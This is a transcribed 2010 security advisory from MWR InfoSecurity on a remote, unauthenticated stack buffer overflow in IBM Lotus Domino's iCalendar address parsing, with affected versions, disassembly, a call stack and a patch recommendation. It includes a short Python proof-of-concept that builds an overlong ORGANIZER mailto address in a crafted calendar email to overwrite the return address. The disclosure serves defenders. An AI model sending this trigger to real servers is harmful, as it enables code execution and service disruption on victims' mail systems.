MWR InfoSecurity Security Advisory. IBM Lotus Domino icalendar Address Stack Buffer Overflow Vulnerability. 14 th September 2010

Transcription

1 MWR InfoSecurity Security Advisory IBM Lotus Domino icalendar Address Stack Buffer Overflow Vulnerability 14 th September Page 1 of 8

2 CONTENTS CONTENTS 1 Detailed Vulnerability Description Introduction Technical Background Exploit Information Dependencies Recommendations Page 2 of 8

3 IBM Lotus Domino icalendar Address Stack Buffer Overflow Vulnerability IBM Lotus Domino icalendar Address Stack Buffer Overflow Vulnerability Package Name: Lotus Domino Server Date Reported: Affected Versions: Versions 8.0 and 8.5 on AIX, AIX 64bit, Linux, Linux iseries, Linux zseries, Solaris, Windows, Windows 64bit, z/os CVE Reference Not Yet Assigned Author A. Plaskett Severity High Risk Local/Remote Remote Impact The vulnerability would enable an attacker to execute arbitrary code on the system in the context of the currently executing nrouter process. Vulnerability Class Stack based buffer overflow Vendor URL Version 8.0, 8.5 Vendor Response A patch is available from: 01.ibm.com/support/docview.wss?rs=475&uid=swg Exploit Details Included Yes (Proof of concept code included). Overview: An unauthenticated remote code execution vulnerability was identified in the code handling the conversion and checking of an icalendar address parameter. An overly large address string can lead to the overflow of a stack allocated buffer due to insufficient bounds checking when a CStrcpy (string copy) is performed. A remote, unauthenticated attacker could execute code in the context of the Lotus Domino server process (nrouter.exe) by sending a specially crafted malicious to the Lotus Domino SMTP server. Impact: The vulnerability would enable an attacker to execute arbitrary code on the system in the context of the currently executing nrouter process. In the majority of installations this will be with local SYSTEM privileges. This could also be used to disrupt legitimate access to the services provided. Cause: This vulnerability is caused by the lack of bounds checking when performing a string copy operation (Cstrcpy) into a fixed size stack based buffer. Interim Workaround: It may be possible to filter malicious mails of this type out using upstream filtering. However, full mitigation will require patching of the domino server. Solution: It is recommended that the vendor supplied patch is installed from 01.ibm.com/support/docview.wss?rs=475&uid=swg Page 3 of 8

4 Detailed Vulnerability Description 1 Detailed Vulnerability Description 1.1 Introduction Lotus Domino is currently developed by IBM and described by the vendor as follows: IBM Lotus Domino software is a world class platform for critical business, collaboration, and messaging applications. It delivers highly reliable, scalable, and security-rich applications at a low total cost of ownership, helping companies enhance the productivity of people, streamline business processes and improve overall business responsiveness. Source: icalendar is described as follows: icalendar is an Internet standard (RFC 2445) for deploying interoperable calendaring and scheduling services for the Internet. The standard is sometimes referred to as ical. The icalendar format is suitable as an exchange format between applications or systems, thereby allowing users of different Internet mail applications to exchange calendar information. icalendar information is formatted as a Multipurpose Internet Mail Extensions (MIME) content type: text/calendar. MIME enables the object to be exchanged using several transports, including SMTP, HTTP, a file system, and desktop interactive protocols such as the clipboard or drag-anddrop interactions, point-to-point asynchronous communication, and wired-network transport. icalendar allows users to send meeting requests and tasks to other users through . Recipients of the icalendar (with supported software) can respond to the sender easily, or they can counter-propose another meeting date or time. icalendar is implemented and supported by a large number of products. Source: icalendar/index.html 1.2 Technical Background The vulnerability exists due to a lack of bounds checking performed in the function nnotes!mailcheck821address before performing a string copy operation (Cstrcpy)..text:602738F7 push esi.text:602738f8 push edx.text:602738f9 call Cstrcpy The ESI register holds the source address of the copy, which is read from the icalendar and so is under an attacker s control. The EDX register holds the address of the fixed size stack buffer. Consequently, the Cstrcpy operation can be passed a string which overflows the fixed size stack based buffer and causes memory corruption. This memory corruption can be used to hijack the flow of execution of the program and execute arbitrary code Page 4 of 8

5 Detailed Vulnerability Description 1.3 Exploit Information An attacker could exploit this vulnerability by crafting an containing an icalendar with an address string which is sufficiently long to overwrite stack based variables and also overwrite the saved return address which is stored in the stack frame (the required string length being 2374 bytes). The attacker could then pass an address which would be used to overwrite the saved return address. When the function returns, the return address is popped off the stack and loaded into the EIP (Extended Instruction Pointer) register. At this point, the attacker has full control over the execution of the program and can execute their desired code. The following proof of concept Python code excerpt can be used to trigger the vulnerability with the malicious ORGANIZER mailto address: ret_address = BBBB overflow = ("A" * 2374) + ret_address + ("C" * 6632) organiser = "ORGANIZER:mailto:H@%s.com" % overflow body = "Content-Type: text/calendar; method=counter; charset="utf-8" Subject: sent_mail2.txt MIME-Version: 1.0 Content-Transfer-Encoding: 8bit BEGIN:VCALENDAR METHOD:COUNTER PRODID:-//HGOPO@VDGCOHBCOGHRO@GQHOOPGHHCCCGCBGGCLGMCPN// VERSION:2.0 BEGIN:VEVENT UID:KORBOOGGGOHGNIH SEQ:2 RRULE:aaaa %s ATTENDEE;:Mailto:aaaa@localdomain SUMMARY:PGOMG@OMPGR@KOFMEOPNCMH DTSTART: T093000Z DTEND: T093000Z DTSTAMP: T083147Z LOCATION:Location STATUS:aaaa END:VEVENT END:VCALENDAR % organiser If this is delivered to a Lotus Domino SMTP server, nrouter will perform the following calls: c 60ca844c 094dddb8 nnotes!mailcheck821address+0xb c f8 nnotes!note2ical+0x1c25c a f8 094de824 nnotes!ical2notesextract+0x c7 06e41f ac nrouter+0x3ee9e c7 06e41f62 nrouter+0x3f1cd 02a19f c7 nrouter+0x1c a f23325 nrouter+0x1ddd a nrouter+0x1e3a5 029b nrouter+0x1e6ed dffd4 7751b3f5 nnotes!osprocessisgui+0xef e454e kernel32!basethreadinitthunk+0x12 600fe ntdll!rtlinitializeexceptionchain+0x63 600fe ntdll!rtlinitializeexceptionchain+0x Page 5 of 8

6 Detailed Vulnerability Description Leading to the incorrectly bounded Cstrcpy function being called and the return address being overwritten with , which will then be loaded into the EIP register. At this point the attacker has full control over the flow of execution of the program (nrouter.exe). 1.4 Dependencies In order to exploit this vulnerability an attacker would need to know the address of a valid Lotus Domino mailbox account. It should be noted, however, that no user interaction is required for the vulnerability to be triggered (nrouter will process the automatically) Page 6 of 8

7 Recommendations 2 Recommendations It is recommended that all users install the appropriate security patch released by the vendor in response to this issue. Links to the updated software can be found at the following location: Page 7 of 8

8 MWR InfoSecurity St. Clement House 1-3 Alencon Link Basingstoke, RG21 7SB Tel: +44 (0) Fax: +44 (0) mwrinfosecurity.com Page 8 of 8